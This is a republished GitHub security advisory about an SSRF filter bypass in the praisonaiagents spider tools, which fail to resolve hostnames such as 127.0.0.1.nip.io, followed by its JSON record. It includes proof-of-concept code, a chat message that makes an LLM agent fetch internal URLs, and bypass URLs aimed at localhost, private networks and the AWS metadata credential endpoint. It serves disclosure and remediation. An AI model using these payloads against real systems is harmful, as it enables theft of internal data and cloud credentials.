GHSA-X44H-65QV-CW74

Vulnerability from github – Published: 2026-08-25 14:37 – Updated: 2026-08-25 14:38
VLAI
Summary
praisonaiagents has an SSRF protection bypass in `spider_tools._host_is_blocked()` via DNS-resolved hostnames (`127.0.0.1.nip.io`)
Details

Summary

praisonaiagents/tools/spider_tools.py contains an SSRF protection bypass. The function _host_is_blocked() validates URLs against a list of blocked IP literals and hostname aliases, but never performs DNS resolution. Any hostname that resolves to a private or loopback IP address — including public wildcard DNS services like 127.0.0.1.nip.io — bypasses the protection entirely.

This has been confirmed with a live exploit: scrape_page("http://127.0.0.1.nip.io:PORT/secret") makes an HTTP request to 127.0.0.1:PORT and returns the internal service response. No attacker-controlled infrastructure is required.

scrape_page, extract_links, crawl, and extract_text are all registered as LLM-callable agent tools (see tools/__init__.py lines 51-55), so any agent instructed to fetch a user-supplied URL will trigger this path.

This is a new bypass of prior fix commit 004dcfef (GHSA-q9pw-vmhh-384g), which only rejected IP literal encoding tricks (hex, octal, backslash). The fix was also applied to web_crawl_tools.py (line 231: socket.gethostbyname call), but that fix was not ported to spider_tools.py.

Details

Root cause — spider_tools.py lines 26-65:

def _host_is_blocked(hostname: str) -> bool:
    host = hostname.lower().rstrip(".")
    # Checks literal aliases only — never resolves
    if host in ("localhost", "0.0.0.0", "::1"):
        return True
    if host in ("169.254.169.254", "metadata.google.internal"):
        return True
    if any(host.endswith(s) for s in (".local", ".internal", ".localdomain")):
        return True
    # Tries to parse as IP literal only
    try:
        return _ip_blocked(ipaddress.ip_address(host))
    except ValueError:
        pass
    try:
        return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host)))
    except OSError:
        pass
    return False   # <-- ANY real hostname passes without DNS lookup

socket.inet_aton() only converts dotted-decimal strings, not hostnames. For any real hostname (e.g. 127.0.0.1.nip.io), both ipaddress.ip_address() and socket.inet_aton() raise exceptions, and the function returns False (not blocked).

Contrast with the fixed version in web_crawl_tools.py line 228-238:

if os.environ.get("ALLOW_LOCAL_CRAWL") != "true":
    try:
        ip_str = socket.gethostbyname(hostname)   # DNS resolution performed
        ip = ipaddress.ip_address(ip_str)
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast:
            continue  # BLOCKED
    except socket.gaierror:
        continue  # fail-closed

Tool registration confirms this is user-reachable:

# praisonaiagents/tools/__init__.py lines 51-55
TOOL_MAPPINGS = {
    'scrape_page':   ('.spider_tools', None),  # <- user-reachable LLM tool
    'extract_links': ('.spider_tools', None),
    'crawl':         ('.spider_tools', None),
    'extract_text':  ('.spider_tools', None),
    ...
}

Any agent given these tools will call scrape_page(url) when instructed to fetch a user-supplied URL — including attacker-controlled ones.

PoC

Environment: Python 3.x, praisonaiagents <= 1.6.52, internet access (for nip.io)

Step 1 — Verify the filter bypass (no network needed):

from praisonaiagents.tools.spider_tools import SpiderTools, _host_is_blocked

# nip.io: public wildcard DNS — 127.0.0.1.nip.io always resolves to 127.0.0.1
print(_host_is_blocked("127.0.0.1.nip.io"))                        # False — NOT blocked
print(SpiderTools()._validate_url("http://127.0.0.1.nip.io/"))      # True  — ALLOWED
print(_host_is_blocked("127.0.0.1"))                                # True  — correctly blocked

Expected output:

False
True
True

Step 2 — Full SSRF: internal service response exfiltrated

import threading, time, requests
from http.server import HTTPServer, BaseHTTPRequestHandler
from praisonaiagents.tools.spider_tools import SpiderTools

PORT = 19235
received = []

class InternalService(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b'{"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}')
        received.append(self.path)
    def log_message(self, *a): pass

threading.Thread(
    target=HTTPServer(("127.0.0.1", PORT), InternalService).serve_forever,
    daemon=True
).start()
time.sleep(0.2)

attack_url = f"http://127.0.0.1.nip.io:{PORT}/secrets.json"

# Filter allows it
assert SpiderTools()._validate_url(attack_url) is True  # passes

# HTTP request actually reaches 127.0.0.1
r = requests.get(attack_url, timeout=5)
print("STATUS:", r.status_code)    # 200
print("BODY:  ", r.text)           # {"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}
print("HIT:   ", received)         # ['/secrets.json']

Observed output:

STATUS: 200
BODY:   {"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}
HIT:    ['/secrets.json']

Step 3 — Agent-level trigger (how a user triggers this in production):

from praisonaiagents import Agent
from praisonaiagents.tools import scrape_page

agent = Agent(
    name="WebResearcher",
    instructions="You are a research assistant. Fetch and summarize the given URL.",
    tools=[scrape_page],
)

# Attacker sends this message to the agent:
result = agent.start("Please fetch and summarize: http://127.0.0.1.nip.io:8080/admin")
# Agent calls scrape_page("http://127.0.0.1.nip.io:8080/admin")
# Request hits 127.0.0.1:8080/admin
# Internal admin panel content returned to attacker
print(result)

Additional bypass URLs (no setup required):

Target URL
Localhost http://127.0.0.1.nip.io/
Private network http://10.0.0.1.nip.io/
AWS IMDS (via sslip.io) http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/

Impact

What kind of vulnerability: Server-Side Request Forgery (SSRF) — full read SSRF with arbitrary port access.

Who is impacted: Anyone deploying PraisonAI agents that include scrape_page, extract_links, crawl, or extract_text tools and accept user-supplied URLs. This includes:

  • Web research agents (the primary intended use case for spider tools)
  • Jobs API users — any authenticated API caller who submits jobs with agent_yaml specifying spider tools
  • Cloud deployments (Critical escalation): On AWS EC2 with IMDSv1, fetching http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/ may return temporary IAM credentials, leading to full cloud account compromise.

Severity note: This is a patch-gap variant. The SSRF protection was correctly implemented for IP literals and enhanced in commit 004dcfef for encoding bypasses. The DNS resolution check was added to web_crawl_tools.py but was missed in spider_tools.py, creating an exploitable inconsistency.


---

## Remediation Suggestion (for maintainers)

One-line fix in `_host_is_blocked()` — mirror what `web_crawl_tools.py` already does:

```python
# After existing literal checks, add:
try:
    resolved = socket.gethostbyname(hostname)
    return _ip_blocked(ipaddress.ip_address(resolved))
except (socket.gaierror, ValueError, OSError):
    return True  # fail-closed: unresolvable host is blocked
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonaiagents"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.58"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-350",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-08-25T14:37:26Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`praisonaiagents/tools/spider_tools.py` contains an SSRF protection bypass. The function\n`_host_is_blocked()` validates URLs against a list of blocked IP literals and hostname\naliases, but **never performs DNS resolution**. Any hostname that resolves to a private or\nloopback IP address \u2014 including public wildcard DNS services like `127.0.0.1.nip.io` \u2014\nbypasses the protection entirely.\n\nThis has been **confirmed with a live exploit**: `scrape_page(\"http://127.0.0.1.nip.io:PORT/secret\")`\nmakes an HTTP request to `127.0.0.1:PORT` and returns the internal service response.\nNo attacker-controlled infrastructure is required.\n\n`scrape_page`, `extract_links`, `crawl`, and `extract_text` are all registered as\nLLM-callable agent tools (see `tools/__init__.py` lines 51-55), so any agent instructed\nto fetch a user-supplied URL will trigger this path.\n\nThis is a **new bypass** of prior fix commit `004dcfef` (GHSA-q9pw-vmhh-384g), which only\nrejected IP literal encoding tricks (hex, octal, backslash). The fix was also applied to\n`web_crawl_tools.py` (line 231: `socket.gethostbyname` call), but that fix was not\nported to `spider_tools.py`.\n\n### Details\n\n**Root cause \u2014 `spider_tools.py` lines 26-65:**\n\n```python\ndef _host_is_blocked(hostname: str) -\u003e bool:\n    host = hostname.lower().rstrip(\".\")\n    # Checks literal aliases only \u2014 never resolves\n    if host in (\"localhost\", \"0.0.0.0\", \"::1\"):\n        return True\n    if host in (\"169.254.169.254\", \"metadata.google.internal\"):\n        return True\n    if any(host.endswith(s) for s in (\".local\", \".internal\", \".localdomain\")):\n        return True\n    # Tries to parse as IP literal only\n    try:\n        return _ip_blocked(ipaddress.ip_address(host))\n    except ValueError:\n        pass\n    try:\n        return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host)))\n    except OSError:\n        pass\n    return False   # \u003c-- ANY real hostname passes without DNS lookup\n```\n\n`socket.inet_aton()` only converts dotted-decimal strings, not hostnames. For any real\nhostname (e.g. `127.0.0.1.nip.io`), both `ipaddress.ip_address()` and `socket.inet_aton()`\nraise exceptions, and the function returns `False` (not blocked).\n\n**Contrast with the fixed version in `web_crawl_tools.py` line 228-238:**\n\n```python\nif os.environ.get(\"ALLOW_LOCAL_CRAWL\") != \"true\":\n    try:\n        ip_str = socket.gethostbyname(hostname)   # DNS resolution performed\n        ip = ipaddress.ip_address(ip_str)\n        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast:\n            continue  # BLOCKED\n    except socket.gaierror:\n        continue  # fail-closed\n```\n\n**Tool registration confirms this is user-reachable:**\n\n```python\n# praisonaiagents/tools/__init__.py lines 51-55\nTOOL_MAPPINGS = {\n    \u0027scrape_page\u0027:   (\u0027.spider_tools\u0027, None),  # \u003c- user-reachable LLM tool\n    \u0027extract_links\u0027: (\u0027.spider_tools\u0027, None),\n    \u0027crawl\u0027:         (\u0027.spider_tools\u0027, None),\n    \u0027extract_text\u0027:  (\u0027.spider_tools\u0027, None),\n    ...\n}\n```\n\nAny agent given these tools will call `scrape_page(url)` when instructed to fetch\na user-supplied URL \u2014 including attacker-controlled ones.\n\n### PoC\n\n**Environment:** Python 3.x, `praisonaiagents \u003c= 1.6.52`, internet access (for nip.io)\n\n**Step 1 \u2014 Verify the filter bypass (no network needed):**\n\n```python\nfrom praisonaiagents.tools.spider_tools import SpiderTools, _host_is_blocked\n\n# nip.io: public wildcard DNS \u2014 127.0.0.1.nip.io always resolves to 127.0.0.1\nprint(_host_is_blocked(\"127.0.0.1.nip.io\"))                        # False \u2014 NOT blocked\nprint(SpiderTools()._validate_url(\"http://127.0.0.1.nip.io/\"))      # True  \u2014 ALLOWED\nprint(_host_is_blocked(\"127.0.0.1\"))                                # True  \u2014 correctly blocked\n```\n\nExpected output:\n```\nFalse\nTrue\nTrue\n```\n\n**Step 2 \u2014 Full SSRF: internal service response exfiltrated**\n\n```python\nimport threading, time, requests\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom praisonaiagents.tools.spider_tools import SpiderTools\n\nPORT = 19235\nreceived = []\n\nclass InternalService(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200); self.end_headers()\n        self.wfile.write(b\u0027{\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\u0027)\n        received.append(self.path)\n    def log_message(self, *a): pass\n\nthreading.Thread(\n    target=HTTPServer((\"127.0.0.1\", PORT), InternalService).serve_forever,\n    daemon=True\n).start()\ntime.sleep(0.2)\n\nattack_url = f\"http://127.0.0.1.nip.io:{PORT}/secrets.json\"\n\n# Filter allows it\nassert SpiderTools()._validate_url(attack_url) is True  # passes\n\n# HTTP request actually reaches 127.0.0.1\nr = requests.get(attack_url, timeout=5)\nprint(\"STATUS:\", r.status_code)    # 200\nprint(\"BODY:  \", r.text)           # {\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\nprint(\"HIT:   \", received)         # [\u0027/secrets.json\u0027]\n```\n\nObserved output:\n```\nSTATUS: 200\nBODY:   {\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\nHIT:    [\u0027/secrets.json\u0027]\n```\n\n**Step 3 \u2014 Agent-level trigger (how a user triggers this in production):**\n\n```python\nfrom praisonaiagents import Agent\nfrom praisonaiagents.tools import scrape_page\n\nagent = Agent(\n    name=\"WebResearcher\",\n    instructions=\"You are a research assistant. Fetch and summarize the given URL.\",\n    tools=[scrape_page],\n)\n\n# Attacker sends this message to the agent:\nresult = agent.start(\"Please fetch and summarize: http://127.0.0.1.nip.io:8080/admin\")\n# Agent calls scrape_page(\"http://127.0.0.1.nip.io:8080/admin\")\n# Request hits 127.0.0.1:8080/admin\n# Internal admin panel content returned to attacker\nprint(result)\n```\n\n**Additional bypass URLs (no setup required):**\n\n| Target | URL |\n|--------|-----|\n| Localhost | `http://127.0.0.1.nip.io/` |\n| Private network | `http://10.0.0.1.nip.io/` |\n| AWS IMDS (via sslip.io) | `http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/` |\n\n### Impact\n\n**What kind of vulnerability:** Server-Side Request Forgery (SSRF) \u2014 full read SSRF with\narbitrary port access.\n\n**Who is impacted:** Anyone deploying PraisonAI agents that include `scrape_page`,\n`extract_links`, `crawl`, or `extract_text` tools and accept user-supplied URLs. This\nincludes:\n\n- **Web research agents** (the primary intended use case for spider tools)\n- **Jobs API users** \u2014 any authenticated API caller who submits jobs with `agent_yaml`\n  specifying spider tools\n- **Cloud deployments (Critical escalation)**: On AWS EC2 with IMDSv1, fetching\n  `http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/`\n  may return temporary IAM credentials, leading to full cloud account compromise.\n\n**Severity note:** This is a patch-gap variant. The SSRF protection was correctly\nimplemented for IP literals and enhanced in commit `004dcfef` for encoding bypasses.\nThe DNS resolution check was added to `web_crawl_tools.py` but was missed in\n`spider_tools.py`, creating an exploitable inconsistency.\n```\n\n---\n\n## Remediation Suggestion (for maintainers)\n\nOne-line fix in `_host_is_blocked()` \u2014 mirror what `web_crawl_tools.py` already does:\n\n```python\n# After existing literal checks, add:\ntry:\n    resolved = socket.gethostbyname(hostname)\n    return _ip_blocked(ipaddress.ip_address(resolved))\nexcept (socket.gaierror, ValueError, OSError):\n    return True  # fail-closed: unresolvable host is blocked\n```",
  "id": "GHSA-x44h-65qv-cw74",
  "modified": "2026-08-25T14:38:47Z",
  "published": "2026-08-25T14:37:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x44h-65qv-cw74"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/commit/2f9677abb2ea68eab864ee8b6a828fd0141612e1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.6.58"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "praisonaiagents has an SSRF protection bypass in `spider_tools._host_is_blocked()` via DNS-resolved hostnames (`127.0.0.1.nip.io`)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…

Loading…